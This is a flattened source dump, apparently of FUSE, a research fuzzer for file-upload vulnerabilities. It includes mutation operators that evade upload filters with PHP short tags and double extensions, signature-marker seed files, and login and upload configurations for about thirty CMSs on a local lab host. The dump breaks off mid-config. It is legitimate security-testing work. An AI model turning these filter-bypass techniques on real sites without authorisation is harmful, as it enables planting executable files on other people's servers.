├── tester ├── __init__.py ├── utils.py └── mutation_tester.py ├── mutation_op ├── __init__.py ├── mutation_op.py ├── m05.py ├── m12_html.py ├── m13.py ├── m09.py ├── m03_jpg.py ├── m03_pdf.py ├── m03_zip.py ├── m11.py ├── m12_xhtml.py ├── m04_gif.py ├── m04_png.py ├── m04_jpg.py ├── m02_jsgif.py ├── m02_pdf.py ├── m01_jpg.py ├── m01_gif.py ├── m01_zip.py ├── m01_pdf.py ├── m01_png.py ├── m01_tar_gz.py ├── m02_jpg.py ├── m02_jsbmp.py ├── m04_zip.py ├── m04_tar_gz.py ├── m04_txt.py ├── m04_pdf.py ├── m02_png.py ├── m08.py ├── m02_zip.py ├── m04_xht.py ├── m02_gif.py ├── m12_xht.py ├── m12_xla.py ├── m12_gzip.py ├── m12_m4v.py ├── m12_pages.py ├── m06.py ├── m04_phar.py ├── m04_php3.py ├── m04_php4.py ├── m04_php5.py ├── m04_php7.py ├── m04_pht.py ├── m04_phtml.py ├── m12_txt.py ├── m04_m4v.py ├── m04_xla.py ├── m04_gzip.py ├── m04_pages.py ├── m12_zip.py ├── m10.py ├── m12_jpg.py ├── m12_pdf.py ├── m12_png.py ├── m12_tar_gz.py ├── m12_gif.py └── m07.py ├── .gitignore ├── resource ├── test.bmp ├── test.gif ├── test.jpg ├── test.pdf ├── test.png ├── test.zip └── test.tar.gz ├── requirements.txt ├── seed ├── seed.php ├── seed.js ├── seed.html └── seed.xhtml ├── configs ├── default-credential.conf ├── anchor-credential.conf ├── joomla-credential.conf ├── bludit-credential.conf ├── subrion-credential-non-monitor.conf ├── codiad-credential.conf ├── elgg-credential.conf ├── cmsmadesimple-credential-non-monitor.conf ├── dotplant2-credential.conf ├── phpbb3_credential.conf ├── pagekit-credential.conf ├── cmsimple-credential-non-monitor.conf ├── webid-credential-non-monitor.conf ├── textpattern-credential.conf ├── clipper-credential-non-monitor.conf ├── monstra-credential-non-monitor.conf ├── x2engine-new-credential.conf ├── microweber-credential.conf ├── zencart-credential-non-monitor.conf ├── octobercms-credential.conf ├── symphony-credential.conf ├── concrete5-credential-non-monitor_new.conf ├── composr-credential.conf ├── concrete5-credential-non-monitor.conf ├── 
getsimplecms-credential-non-monitor.conf ├── collabtive-credential-mk2-non-monitor.conf ├── mybb-credential.conf ├── eccube-credential-non-monitor.conf ├── wordpress-credential.conf ├── silverstripe-credential-non-monitor.conf ├── xe-credential.conf ├── oscommerce2-credential-non-monitor.conf ├── hotcrp-credential.conf ├── drupal-credential-nonmonitor.conf └── README.md ├── utils.py ├── rabbitmq.py ├── README.md ├── filemutator.py └── filemonitor.py /tester/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /mutation_op/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /tester/utils.py: -------------------------------------------------------------------------------- 1 | ../utils.py -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | *.pyc 2 | *.swp 3 | -------------------------------------------------------------------------------- /resource/test.bmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/WSP-LAB/FUSE/HEAD/resource/test.bmp -------------------------------------------------------------------------------- /resource/test.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/WSP-LAB/FUSE/HEAD/resource/test.gif -------------------------------------------------------------------------------- /resource/test.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/WSP-LAB/FUSE/HEAD/resource/test.jpg -------------------------------------------------------------------------------- 
/resource/test.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/WSP-LAB/FUSE/HEAD/resource/test.pdf -------------------------------------------------------------------------------- /resource/test.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/WSP-LAB/FUSE/HEAD/resource/test.png -------------------------------------------------------------------------------- /resource/test.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/WSP-LAB/FUSE/HEAD/resource/test.zip -------------------------------------------------------------------------------- /resource/test.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/WSP-LAB/FUSE/HEAD/resource/test.tar.gz -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | beautifulsoup4==4.6.0 2 | pyinotify==0.9.6 3 | pika==0.12.0 4 | selenium==3.14.1 5 | -------------------------------------------------------------------------------- /seed/seed.php: -------------------------------------------------------------------------------- 1 | alert('".$sign."');";?> 2 | -------------------------------------------------------------------------------- /seed/seed.js: -------------------------------------------------------------------------------- 1 | var genHead = ((589998498*2+1).toString(16)).match(/.{1,2}/g);for(var i=0;i -------------------------------------------------------------------------------- /seed/seed.html: -------------------------------------------------------------------------------- 1 | FUSESEED-HTML 2 | -------------------------------------------------------------------------------- /configs/default-credential.conf: 
-------------------------------------------------------------------------------- 1 | [USER_CREDENTIAL] 2 | 3 | ID = 4 | PW = 5 | WebRootPath = 6 | WebHost = 7 | WebLoginIDName = 8 | WebLoginPWName = 9 | WebLoginURL = 10 | WebLoginPageURL = 11 | WebLoginCSRFName = 12 | WebLoginAdditionalValue = 13 | WebLoginSuccessStr = 14 | WebUploadURL = 15 | WebUploadPageURL = 16 | WebUploadFormAttr = 17 | WebUploadCustomHeader = 18 | WebUploadCSRFName = 19 | WebUploadSuccessStr = 20 | WebUploadAdditionalValue = 21 | WebUploadedFileUrlPattern = 22 | WebUploadFilesURL = 23 | WebUploadFilesParameter = 24 | 25 | [DETECTOR_CONF] 26 | 27 | MutationChainLimit = 99 28 | MonitorEnable = True 29 | MonitorHost = 30 | MonitorPort = 31 | -------------------------------------------------------------------------------- /mutation_op/mutation_op.py: -------------------------------------------------------------------------------- 1 | from abc import * 2 | 3 | class MutationOP: 4 | 5 | __metaclass__ = ABCMeta 6 | 7 | # Attributes for each operation 8 | __comment__ = "Base Class" 9 | __mutate_type__ = "" # (file|request) ; type of target 10 | __exclusion_op__ = {} # ({type:[classname]}) when this op is used for mutation, 11 | # operations in this list can be used for extra mutation. 12 | __resource__ = {"":""} # ({type:resource filename}) 13 | __seed_dependency__ = [] # ([filetype]) ; seed file dependency for operation 14 | 15 | 16 | # Maybe we need to change seed_file to request later 17 | # def __init__(self): 18 | # self.output = output 19 | 20 | @abstractmethod 21 | def operation(self): 22 | pass 23 | -------------------------------------------------------------------------------- /seed/seed.xhtml: -------------------------------------------------------------------------------- 1 | FUSESEED-XHTML

FUSE TEST

2 | -------------------------------------------------------------------------------- /utils.py: -------------------------------------------------------------------------------- 1 | import mimetypes 2 | import datetime 3 | import hashlib 4 | 5 | def print_mutate_information(mutate_list, seed_file, resource_file): 6 | print '[*] Mutation Information' 7 | print '[*] mutate_list:', mutate_list 8 | print '[*] seed_file:', seed_file 9 | print '[*] resource_file', resource_file 10 | print '\n' 11 | 12 | def extract_content(path): 13 | with open(path, "rb") as f: 14 | content = f.read() 15 | return content 16 | 17 | def extract_fileext(path): 18 | return path.split('.')[-1] 19 | 20 | def extract_filename(path): 21 | # return path.split('/')[-1].split('.')[0] 22 | return hashlib.md5(datetime.datetime.now().__str__()).hexdigest() 23 | 24 | def extract_filetype(path): 25 | return mimetypes.guess_type(path)[0] or 'application/octet-stream' 26 | 27 | def getMD5hash(binary): 28 | return hashlib.md5(binary).hexdigest() 29 | -------------------------------------------------------------------------------- /configs/anchor-credential.conf: -------------------------------------------------------------------------------- 1 | [USER_CREDENTIAL] 2 | 3 | ID = vuln_web 4 | PW = vu!nweb321 5 | WebRootPath = /var/www/html/ 6 | WebHost = http://127.0.0.1 7 | WebLoginIDName = user 8 | WebLoginPWName = pass 9 | WebLoginURL = http://127.0.0.1/anchor/admin/login 10 | WebLoginPageURL = http://127.0.0.1/anchor/admin/login 11 | WebLoginCSRFName = token 12 | WebLoginAdditionalValue = 13 | WebLoginSuccessStr = logout">Logout 14 | WebUploadURL = http://127.0.0.1/anchor/admin/upload 15 | WebUploadPageURL = http://127.0.0.1/anchor/admin/posts/add 16 | WebUploadFormAttr = 17 | WebUploadCustomHeader = 18 | WebUploadCSRFName = 19 | WebUploadSuccessStr = %filename# 20 | WebUploadAdditionalValue = file=%filebinary# 21 | WebUploadedFileUrlPattern = http://127.0.0.1/anchor/content/%filename# 22 | 
WebUploadFilesURL = 23 | WebUploadFilesParameter = 24 | 25 | [DETECTOR_CONF] 26 | 27 | MutationChainLimit = 99 28 | MonitorEnable = False 29 | MonitorHost = 30 | MonitorPort = 31 | -------------------------------------------------------------------------------- /mutation_op/m05.py: -------------------------------------------------------------------------------- 1 | from mutation_op import * 2 | import utils 3 | 4 | class mOP(MutationOP): 5 | __comment__ = "Mutation 5: Change PHP tag to short tag" 6 | __mutate_type__ = "file" # (file|request) ; type of target 7 | 8 | # XXX: Fill the exclusion operator and seed dependency 9 | __exclusion_op__ = {'php':['M05']}# [] # ([classname])when this op used for mutation, 10 | # operations in this list can be used to extra mutation. 11 | __resource__ = {} # ({type:resource filename}) 12 | __seed_dependency__ = __exclusion_op__.keys()#self.__exclusion_op__.keys()#['php'] # seed file dependency for operation 13 | 14 | def operation(self, output, seed_file, resource_file=None): 15 | output['content'] = output['content'].replace(' 0: 17 | filename = output['filename'] 18 | else: 19 | filename = utils.extract_filename(seed_file) 20 | output['filename'] = filename + '_M5' 21 | -------------------------------------------------------------------------------- /configs/joomla-credential.conf: -------------------------------------------------------------------------------- 1 | [USER_CREDENTIAL] 2 | 3 | ID = vuln_web 4 | PW = vu!nweb321 5 | WebRootPath = /var/www/html/ 6 | WebHost = http://127.0.0.1 7 | WebLoginIDName = username 8 | WebLoginPWName = passwd 9 | WebLoginURL = http://127.0.0.1/joomla/administrator/index.php 10 | WebLoginPageURL = http://127.0.0.1/joomla/administrator/index.php 11 | WebLoginCSRFName = %reg:[0-9|a-f]{32}# 12 | WebLoginAdditionalValue = option=com_login;task=login;return=aW5kZXgucGhw 13 | WebLoginSuccessStr = >Logout 14 | WebUploadURL = %find# 15 | WebUploadPageURL = 
http://127.0.0.1/joomla/administrator/index.php?option=com_media&folder=test 16 | WebUploadFormAttr = id=uploadForm 17 | WebUploadCustomHeader = 18 | WebUploadCSRFName = 19 | WebUploadSuccessStr = >Logout 20 | WebUploadAdditionalValue = task 21 | WebUploadedFileUrlPattern = 22 | WebUploadFilesURL = 23 | WebUploadFilesParameter = 24 | 25 | [DETECTOR_CONF] 26 | 27 | MutationChainLimit = 99 28 | MonitorEnable = True 29 | MonitorHost = 127.0.0.1 30 | MonitorPort = 31 | -------------------------------------------------------------------------------- /configs/bludit-credential.conf: -------------------------------------------------------------------------------- 1 | [USER_CREDENTIAL] 2 | 3 | ID = admin 4 | PW = vu!nweb321 5 | WebRootPath = /var/www/html/ 6 | WebHost = http://127.0.0.1 7 | WebLoginIDName = username 8 | WebLoginPWName = password 9 | WebLoginURL = http://127.0.0.1/bludit/admin/ 10 | WebLoginPageURL = http://127.0.0.1/bludit/admin/ 11 | WebLoginCSRFName = tokenCSRF 12 | WebLoginAdditionalValue = save= 13 | WebLoginSuccessStr = Log out 14 | WebUploadURL = http://127.0.0.1/bludit/admin/ajax/upload-images 15 | WebUploadPageURL = http://127.0.0.1/bludit/admin/new-content 16 | WebUploadFormAttr = 17 | WebUploadCustomHeader = 18 | WebUploadCSRFName = tokenCSRF 19 | #WebUploadSuccessStr = "status":0,"m 20 | WebUploadSuccessStr = " 21 | WebUploadAdditionalValue = uuid=%domtoken:uuid: "[a-z|0-9]{32}"@[a-z|0-9]{32}#;bluditInputFiles[]=%filebinary# 22 | WebUploadedFileUrlPattern = 23 | WebUploadFilesURL = 24 | WebUploadFilesParameter = 25 | 26 | [DETECTOR_CONF] 27 | 28 | MutationChainLimit = 99 29 | MonitorEnable = True 30 | MonitorHost = 127.0.0.1 31 | MonitorPort = 32 | -------------------------------------------------------------------------------- /configs/subrion-credential-non-monitor.conf: -------------------------------------------------------------------------------- 1 | [USER_CREDENTIAL] 2 | 3 | ID = vuln_web 4 | PW = vu!nweb321 5 | WebRootPath = 
/var/www/html/ 6 | WebHost = http://127.0.0.1 7 | WebLoginIDName = username 8 | WebLoginPWName = password 9 | WebLoginURL = http://127.0.0.1/subrion/panel/ 10 | WebLoginPageURL = http://127.0.0.1/subrion/panel/ 11 | WebLoginCSRFName = __st 12 | WebLoginAdditionalValue = 13 | WebLoginSuccessStr = Logout 14 | WebUploadURL = http://127.0.0.1/subrion/panel/uploads/read.json 15 | WebUploadPageURL = http://127.0.0.1/subrion/panel/uploads/ 16 | WebUploadFormAttr = 17 | WebUploadCustomHeader = 18 | WebUploadCSRFName = __st 19 | WebUploadSuccessStr = %notin="result":false# 20 | WebUploadAdditionalValue = reqid=167130a931033;cmd=upload;target=l1_Lw;upload[]=%filebinary#;mtime[]=1541137352 21 | WebUploadedFileUrlPattern = http://127.0.0.1/subrion/uploads/%filename# 22 | WebUploadFilesURL = 23 | WebUploadFilesParameter = 24 | 25 | [DETECTOR_CONF] 26 | 27 | MutationChainLimit = 99 28 | MonitorEnable = False 29 | MonitorHost = 127.0.0.1 30 | MonitorPort = 31 | -------------------------------------------------------------------------------- /configs/codiad-credential.conf: -------------------------------------------------------------------------------- 1 | [USER_CREDENTIAL] 2 | 3 | ID = vuln_web 4 | PW = vu!nweb321 5 | WebRootPath = /var/www/html/ 6 | WebHost = http://127.0.0.1 7 | WebLoginIDName = username 8 | WebLoginPWName = password 9 | WebLoginURL = http://127.0.0.1/codiad/components/user/controller.php?action=authenticate 10 | WebLoginPageURL = http://127.0.0.1/codiad/ 11 | WebLoginCSRFName = 12 | WebLoginAdditionalValue = theme=default;language=en 13 | WebLoginSuccessStr = success 14 | WebUploadURL = http://127.0.0.1/codiad/components/filemanager/controller.php?action=upload&path=test 15 | WebUploadPageURL = http://127.0.0.1/codiad/components/filemanager/dialog_upload.php?path=test 16 | WebUploadFormAttr = 17 | WebUploadCustomHeader = 18 | WebUploadCSRFName = 19 | WebUploadSuccessStr = %filename# 20 | WebUploadAdditionalValue = upload[]=%filebinary# 21 | 
WebUploadedFileUrlPattern = http://127.0.0.1/codiad/workspace/test/%filename# 22 | WebUploadFilesURL = 23 | WebUploadFilesParameter = 24 | 25 | [DETECTOR_CONF] 26 | 27 | MutationChainLimit = 99 28 | MonitorEnable = False 29 | MonitorHost = 127.0.0.1 30 | MonitorPort = 31 | -------------------------------------------------------------------------------- /configs/elgg-credential.conf: -------------------------------------------------------------------------------- 1 | [USER_CREDENTIAL] 2 | 3 | ID = vuln_web 4 | PW = vu!nweb321 5 | WebRootPath = /var/www/html/ 6 | WebHost = http://127.0.0.1 7 | WebLoginIDName = username 8 | WebLoginPWName = password 9 | WebLoginURL = http://127.0.0.1/elgg/action/login 10 | WebLoginPageURL = http://127.0.0.1/elgg/ 11 | WebLoginCSRFName = __elgg_token;__elgg_ts 12 | WebLoginAdditionalValue = returntoreferer=true 13 | WebLoginSuccessStr =

You have been logged in.

14 | WebUploadURL = http://127.0.0.1/elgg/action/file/upload 15 | WebUploadPageURL = http://127.0.0.1/elgg/file/add/36 16 | WebUploadFormAttr = 17 | WebUploadCustomHeader = 18 | WebUploadCSRFName = __elgg_token;__elgg_ts 19 | #WebUploadSuccessStr = %filename# 20 | WebUploadSuccessStr = 21 | WebUploadAdditionalValue = upload=%filebinary#;title=%filename#;description=

as

;tags=5;access_id=2;container_guid=36;file_guid= 22 | WebUploadedFileUrlPattern = 23 | WebUploadFilesURL = 24 | WebUploadFilesParameter = 25 | 26 | [DETECTOR_CONF] 27 | 28 | MutationChainLimit = 99 29 | MonitorEnable = True 30 | MonitorHost = 127.0.0.1 31 | MonitorPort = 32 | -------------------------------------------------------------------------------- /configs/cmsmadesimple-credential-non-monitor.conf: -------------------------------------------------------------------------------- 1 | [USER_CREDENTIAL] 2 | 3 | ID = vuln_web 4 | PW = vu!nweb321 5 | WebRootPath = /var/www/html/ 6 | WebHost = http://127.0.0.1 7 | WebLoginIDName = username 8 | WebLoginPWName = password 9 | WebLoginURL = http://127.0.0.1/cmsms/admin/login.php 10 | WebLoginPageURL = http://127.0.0.1/cmsms/admin/login.php 11 | WebLoginCSRFName = 12 | WebLoginAdditionalValue = loginsubmit=Submit 13 | WebLoginSuccessStr = Logout 14 | WebUploadURL = http://127.0.0.1/cmsms/admin/moduleinterface.php 15 | WebUploadPageURL = http://127.0.0.1/cmsms/admin/moduleinterface.php?mact=FileManager,m1_,defaultadmin,0&__c=%cookie:__c# 16 | WebUploadFormAttr = 17 | WebUploadCustomHeader = 18 | WebUploadCSRFName = 19 | WebUploadSuccessStr = "url": 20 | WebUploadAdditionalValue = mact=FileManager,m1_,upload,0;disable_buffer=1;m1_files[]=%filebinary#;__c=%cookie:__c# 21 | WebUploadedFileUrlPattern = http://127.0.0.1/cmsms/uploads/%filename# 22 | WebUploadFilesURL = 23 | WebUploadFilesParameter = 24 | 25 | [DETECTOR_CONF] 26 | 27 | MutationChainLimit = 99 28 | MonitorEnable = False 29 | MonitorHost = 127.0.0.1 30 | MonitorPort = 31 | -------------------------------------------------------------------------------- /configs/dotplant2-credential.conf: -------------------------------------------------------------------------------- 1 | [USER_CREDENTIAL] 2 | 3 | ID = vuln_web 4 | PW = vu!nweb321 5 | WebRootPath = /var/www/html/dotplant2/web/ 6 | WebHost = http://127.0.0.1:8880 7 | WebLoginIDName = LoginForm[username] 8 | 
WebLoginPWName = LoginForm[password] 9 | WebLoginURL = http://127.0.0.1:8880/login 10 | WebLoginPageURL = http://127.0.0.1:8880/login 11 | WebLoginCSRFName = _csrf;%cookietoken# 12 | WebLoginAdditionalValue = LoginForm[rememberMe]=0;LoginForm[rememberMe]=1 13 | WebLoginSuccessStr = >Logout 14 | WebUploadURL = http://127.0.0.1:8880/page/backend/upload 15 | WebUploadPageURL = http://127.0.0.1:8880/page/backend/edit?id=2&returnUrl=%2Fpage%2Fbackend%2Findex&parent_id=1 16 | WebUploadFormAttr = 17 | WebUploadCustomHeader = 18 | WebUploadCSRFName = _csrf;%cookietoken# 19 | WebUploadSuccessStr = "file":" 20 | WebUploadAdditionalValue = file=%filebinary#;modelId=2;objectId=1 21 | WebUploadedFileUrlPattern = /files/[a-z|0-9|\_|\-|\.]*\.[a-z|0-9]* 22 | WebUploadFilesURL = 23 | WebUploadFilesParameter = 24 | 25 | [DETECTOR_CONF] 26 | 27 | MutationChainLimit = 99 28 | MonitorEnable = False 29 | MonitorHost = 30 | MonitorPort = 31 | -------------------------------------------------------------------------------- /configs/phpbb3_credential.conf: -------------------------------------------------------------------------------- 1 | [USER_CREDENTIAL] 2 | 3 | ID = vuln_web 4 | PW = vu!nweb321 5 | WebRootPath = /var/www/html/ 6 | WebHost = http://127.0.0.1 7 | WebLoginIDName = username 8 | WebLoginPWName = password 9 | WebLoginURL = http://127.0.0.1/phpbb3/ucp.php?mode=login 10 | WebLoginPageURL = http://127.0.0.1/phpbb3/ucp.php?mode=login 11 | WebLoginCSRFName = sid 12 | WebLoginAdditionalValue = redirect=./ucp.php?mode=login;redirect=index.php;login=Login 13 | WebLoginSuccessStr = "username-coloured" 14 | WebUploadURL = http://127.0.0.1/phpbb3/posting.php?mode=post&f=2 15 | WebUploadPageURL = http://127.0.0.1/phpbb3/posting.php?mode=post&f=2 16 | WebUploadFormAttr = 17 | WebUploadCustomHeader = 18 | WebUploadCSRFName = 19 | #WebUploadSuccessStr = %filename# 20 | WebUploadSuccessStr = " 21 | WebUploadAdditionalValue = name=%filename#;chunk=0;chunks=1;add_file=Add the 
file;real_filename=%filename#;fileupload=%filebinary# 22 | WebUploadedFileUrlPattern = 23 | WebUploadFilesURL = 24 | WebUploadFilesParameter = 25 | 26 | [DETECTOR_CONF] 27 | 28 | MutationChainLimit = 99 29 | MonitorEnable = True 30 | MonitorHost = 127.0.0.1 31 | MonitorPort = 32 | -------------------------------------------------------------------------------- /configs/pagekit-credential.conf: -------------------------------------------------------------------------------- 1 | [USER_CREDENTIAL] 2 | 3 | ID = vuln_web 4 | PW = vu!nweb321 5 | WebRootPath = /var/www/html 6 | WebHost = http://127.0.0.1 7 | WebLoginIDName = credentials[username] 8 | WebLoginPWName = credentials[password] 9 | WebLoginURL = http://127.0.0.1/pagekit/user/authenticate 10 | WebLoginPageURL = http://127.0.0.1/pagekit/admin/login 11 | WebLoginCSRFName = _csrf 12 | WebLoginAdditionalValue = redirect=/pagekit/admin 13 | WebLoginSuccessStr = logout?redirect=admin/login 14 | WebUploadURL = http://127.0.0.1/pagekit/system/finder/upload 15 | WebUploadPageURL = http://127.0.0.1/pagekit/admin/site/storage 16 | WebUploadFormAttr = 17 | WebUploadCustomHeader = 18 | WebUploadCSRFName = 19 | WebUploadSuccessStr = message":"Upload complete. 
20 | WebUploadAdditionalValue = files[]=%filebinary#;path=/test;root=storage;_csrf=%domtoken:"csrf":"[0-9|a-f]{40}@[0-9|a-f]{40}# 21 | WebUploadedFileUrlPattern = http://127.0.0.1/pagekit/storage/test/%filename# 22 | WebUploadFilesURL = 23 | WebUploadFilesParameter = 24 | 25 | [DETECTOR_CONF] 26 | 27 | MutationChainLimit = 99 28 | MonitorEnable = False 29 | MonitorHost = 30 | MonitorPort = 31 | -------------------------------------------------------------------------------- /configs/cmsimple-credential-non-monitor.conf: -------------------------------------------------------------------------------- 1 | [USER_CREDENTIAL] 2 | 3 | ID = 4 | PW = vu!nweb321 5 | WebRootPath = /var/www/html/ 6 | WebHost = http://127.0.0.1 7 | WebLoginIDName = user 8 | WebLoginPWName = passwd 9 | WebLoginURL = http://127.0.0.1/cmsimple/?Welcome_to_CMSimple 10 | WebLoginPageURL = http://127.0.0.1/cmsimple/?Welcome_to_CMSimple 11 | WebLoginCSRFName = 12 | WebLoginAdditionalValue = login=true;selected=Welcome_to_CMSimple;submit=Login 13 | WebLoginSuccessStr = Logout 14 | WebUploadURL = http://127.0.0.1/cmsimple/?userfiles&subdir=userfiles/downloads/ 15 | WebUploadPageURL = http://127.0.0.1/cmsimple/?userfiles&subdir=userfiles/downloads/ 16 | WebUploadFormAttr = 17 | WebUploadCustomHeader = 18 | WebUploadCSRFName = csrf_token 19 | WebUploadSuccessStr = %notin=cmsimplecore_warning# 20 | WebUploadAdditionalValue = fbupload=%filebinary#;upload=upload 21 | WebUploadedFileUrlPattern = http://127.0.0.1/cmsimple/userfiles/downloads/%filename# 22 | WebUploadFilesURL = 23 | WebUploadFilesParameter = 24 | 25 | [DETECTOR_CONF] 26 | 27 | MutationChainLimit = 99 28 | MonitorEnable = False 29 | MonitorHost = 127.0.0.1 30 | MonitorPort = 31 | -------------------------------------------------------------------------------- /configs/webid-credential-non-monitor.conf: -------------------------------------------------------------------------------- 1 | [USER_CREDENTIAL] 2 | 3 | ID = vuln_web 4 | PW = vu!nweb321 
5 | WebRootPath = /var/www/html/ 6 | WebHost = http://127.0.0.1 7 | WebLoginIDName = username 8 | WebLoginPWName = password 9 | WebLoginURL = http://127.0.0.1/webid/admin/login.php 10 | WebLoginPageURL = http://127.0.0.1/webid/admin/login.php 11 | WebLoginCSRFName = csrftoken 12 | WebLoginAdditionalValue = action=login;submit=Login 13 | WebLoginSuccessStr = Logged in as: 14 | WebUploadURL = http://127.0.0.1/webid/admin/logo_upload.php 15 | WebUploadPageURL = http://127.0.0.1/webid/admin/logo_upload.php 16 | WebUploadFormAttr = 17 | WebUploadCustomHeader = 18 | WebUploadCSRFName = csrftoken 19 | #WebUploadSuccessStr = Logo uploaded successfully 20 | WebUploadSuccessStr = %notin=alert alert-error# 21 | WebUploadAdditionalValue = action=update;act=Upload Logo;logo=%filebinary# 22 | WebUploadedFileUrlPattern = http://127.0.0.1/webid/uploaded/logo/%filename# 23 | WebUploadFilesURL = 24 | WebUploadFilesParameter = 25 | 26 | [DETECTOR_CONF] 27 | 28 | MutationChainLimit = 99 29 | MonitorEnable = False 30 | MonitorHost = 127.0.0.1 31 | MonitorPort = 32 | 33 | -------------------------------------------------------------------------------- /configs/textpattern-credential.conf: -------------------------------------------------------------------------------- 1 | [USER_CREDENTIAL] 2 | 3 | ID = vuln_web 4 | PW = vu!nweb321 5 | WebRootPath = /var/www/html 6 | WebHost = http://127.0.0.1/ 7 | WebLoginIDName = p_userid 8 | WebLoginPWName = p_password 9 | WebLoginURL = http://127.0.0.1/textpattern/textpattern/index.php 10 | WebLoginPageURL = http://127.0.0.1/textpattern/textpattern/index.php 11 | WebLoginCSRFName = 12 | WebLoginAdditionalValue = _txp_token= 13 | WebLoginSuccessStr = gout=1">Log out

Log Out 14 | WebUploadURL = http://127.0.0.1/monstra/admin/index.php?id=filemanager 15 | WebUploadPageURL = http://127.0.0.1/monstra/admin/index.php?id=filesmanager 16 | WebUploadFormAttr = class=form-inline 17 | WebUploadCustomHeader = 18 | WebUploadCSRFName = csrf 19 | WebUploadSuccessStr = %filename# 20 | WebUploadAdditionalValue = upload_file=Upload 21 | WebUploadedFileUrlPattern = http://127.0.0.1/monstra/public/uploads/[0-9|a-f]{32}(_[a-z|A-Z|0-9|_]*)*.[a-z|A-Z|0-9]* 22 | WebUploadFilesURL = http://127.0.0.1/monstra/admin/index.php?id=filesmanager&path=uploads/ 23 | WebUploadFilesParameter = 24 | 25 | [DETECTOR_CONF] 26 | 27 | MutationChainLimit = 99 28 | MonitorEnable = False 29 | MonitorHost = 127.0.0.1 30 | MonitorPort = 31 | -------------------------------------------------------------------------------- /configs/x2engine-new-credential.conf: -------------------------------------------------------------------------------- 1 | [USER_CREDENTIAL] 2 | 3 | ID = vuln_web 4 | PW = vu!nweb321 5 | WebRootPath = /var/www/html/ 6 | WebHost = http://127.0.0.1 7 | WebLoginIDName = LoginForm[username] 8 | WebLoginPWName = LoginForm[password] 9 | WebLoginURL = http://127.0.0.1/x2crm2/x2engine/index.php/site/login 10 | WebLoginPageURL = http://127.0.0.1/x2crm2/x2engine/index.php/site/login 11 | WebLoginCSRFName = YII_CSRF_TOKEN 12 | WebLoginAdditionalValue = LoginForm[rememberMe]=0;LoginForm[twoFactorCode]=;geoCoords= 13 | WebLoginSuccessStr = >Logout< 14 | WebUploadURL = http://127.0.0.1/x2crm2/x2engine/index.php/site/tmpUpload 15 | WebUploadPageURL = http://127.0.0.1/x2crm2/x2engine/index.php/media/upload 16 | WebUploadFormAttr = 17 | WebUploadCustomHeader = 18 | WebUploadCSRFName = YII_CSRF_TOKEN 19 | WebUploadSuccessStr = : 20 | WebUploadAdditionalValue = upload=%filebinary#;TempFileId=;Media[name]=;Media[associationType]=none;Media[associationId]=;Media[private]=0;Media[description]= 21 | WebUploadedFileUrlPattern = 22 | WebUploadFilesURL = 23 | 
WebUploadFilesParameter = 24 | 25 | [DETECTOR_CONF] 26 | 27 | MutationChainLimit = 99 28 | MonitorEnable = True 29 | MonitorHost = 127.0.0.1 30 | MonitorPort = 31 | -------------------------------------------------------------------------------- /mutation_op/m12_html.py: -------------------------------------------------------------------------------- 1 | from mutation_op import * 2 | import utils 3 | 4 | class mOP(MutationOP): 5 | __comment__ = "Mutation12: Double extension" 6 | __mutate_type__ = "file" # (file|request) ; type of target 7 | __exclusion_op__ = { 8 | 'html':['M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_ZIPX']} 9 | # operations in this list can be used to extra mutation. 10 | __resource__ = {} # ({type:resource filename}) 11 | __seed_dependency__ = __exclusion_op__.keys()#["html","js","php"] # seed file dependency for operation 12 | 13 | def operation(self, output, seed_file, resource_file=None): 14 | if output['filename'] != None and len(output['filename']) > 0: 15 | filename = output['filename'] 16 | else: 17 | filename = utils.extract_filename(seed_file) 18 | 19 | output['filename'] = filename + '_M12HTML' 20 | 21 | output['fileext'] = 'html.'+output['fileext'] 22 | -------------------------------------------------------------------------------- /configs/microweber-credential.conf: -------------------------------------------------------------------------------- 1 | [USER_CREDENTIAL] 2 | 3 | ID = root@localhost.no 4 | PW = vu!nweb321 5 | WebRootPath = /var/www/html/ 6 | WebHost = http://127.0.0.1 7 | WebLoginIDName = username 8 | WebLoginPWName = password 9 | WebLoginURL = http://127.0.0.1/microweber/api/user_login 10 | WebLoginPageURL = 
http://127.0.0.1/microweber/api/user_login 11 | WebLoginCSRFName = 12 | WebLoginAdditionalValue = where_to=admin_content 13 | WebLoginSuccessStr = "success": 14 | WebUploadURL = http://127.0.0.1/microweber/plupload?token=%domtoken:\+= \'token=[a-z|A-Z|0-9|+|/]{40}@[a-z|A-Z|0-9|\+|/]{40}# 15 | WebUploadPageURL = http://127.0.0.1/microweber/admin/view:modules/load_module:files 16 | WebUploadFormAttr = 17 | WebUploadCustomHeader = 18 | WebUploadCSRFName = 19 | WebUploadSuccessStr = %notin="error" : # 20 | WebUploadAdditionalValue = name=%filename#;file=%filebinary# 21 | WebUploadedFileUrlPattern = http://127.0.0.1/microweber/userfiles/media/127.0.0.1/[a-z|0-9]{32}_[0-9|a-z|_|.]*\.[a-z|0-9]* 22 | WebUploadFilesURL = 23 | WebUploadFilesParameter = 24 | 25 | [DETECTOR_CONF] 26 | 27 | MutationChainLimit = 99 28 | MonitorEnable = False 29 | MonitorHost = 127.0.0.1 30 | MonitorPort = 31 | DBHost = 32 | DBPort = 33 | -------------------------------------------------------------------------------- /configs/zencart-credential-non-monitor.conf: -------------------------------------------------------------------------------- 1 | [USER_CREDENTIAL] 2 | 3 | ID = vuln_web 4 | PW = vu!nweb321 5 | WebRootPath = /var/www/html/ 6 | WebHost = 